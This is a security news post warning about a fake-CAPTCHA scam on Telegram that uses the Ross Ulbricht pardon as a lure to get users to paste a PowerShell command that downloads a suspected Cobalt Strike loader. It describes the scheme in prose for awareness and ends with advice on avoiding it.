A new scam campaign has been detected, using a fake captcha trick. Against the background of the released Ross Ulbricht, attackers lure victims who are interested in the news about him being pardoned by Donald Trump to a fraudulent Telegram channel. As a result, the victims use a PowerShell script to initiate a malware download on their device.
Telegram Captcha Exploits PowerShell to Spread Malware
Cybercriminals have upped their game again, now using Telegram as a delivery mechanism for malware under the guise of a CAPTCHA verification system. Leveraging the news about Ross Ulbricht, the infamous Silk Road creator, they lure unsuspecting users into running malicious PowerShell scripts.
Ross Ulbricht, the guy who ran Silk Road (a dark web marketplace for all things illegal), was sentenced to life in 2015, which caused mixed reactions among the public. Former President Trump added fuel by hinting at a pardon, which he finally granted yesterday.
Threat actors seized this news to create fake “official” Ulbricht accounts on X (formerly Twitter), directing curious followers to malicious Telegram channels. On these Telegram channels, users are greeted with a “Safeguard” identity verification aka CAPTCHA. Sounds legit, right?
Except this “verification” process ends with a malicious twist. Users are tricked into running PowerShell commands under the pretense of proving they’re not bots. Here’s the kicker: instead of validating your humanity, the commands download and execute malware.
How the Scam Works?
This is not a new scam method, and I have described it several times before. The only difference is that instead of fake websites, a telegram channel is used. The attack can be divided into 3 parts. The fake verification starts with a mini app that copies a PowerShell command to your clipboard.
Next, users are instructed to paste and execute the command in the Windows Run dialog. The PowerShell command downloads a ZIP file from “http://openline[.]cyou”. Inside, there’s an executable named “identity-helper.exe”, flagged by VirusTotal as a possible Cobalt Strike loader.
Cobalt Strike is a legitimate penetration testing tool often abused by hackers. Once deployed, it provides remote access to compromised systems and their networks. Infections like this frequently pave the way for ransomware or data theft. So, running that PowerShell command is basically handing your computer to the bad guys with a bow on top.
Although this is an obvious ploy from a technical standpoint, average users fall for it, generating demand. To protect yourself, remember one thing – no captcha requires you to paste anything into PowerShell. If you are asked to paste something in, it is a scam.
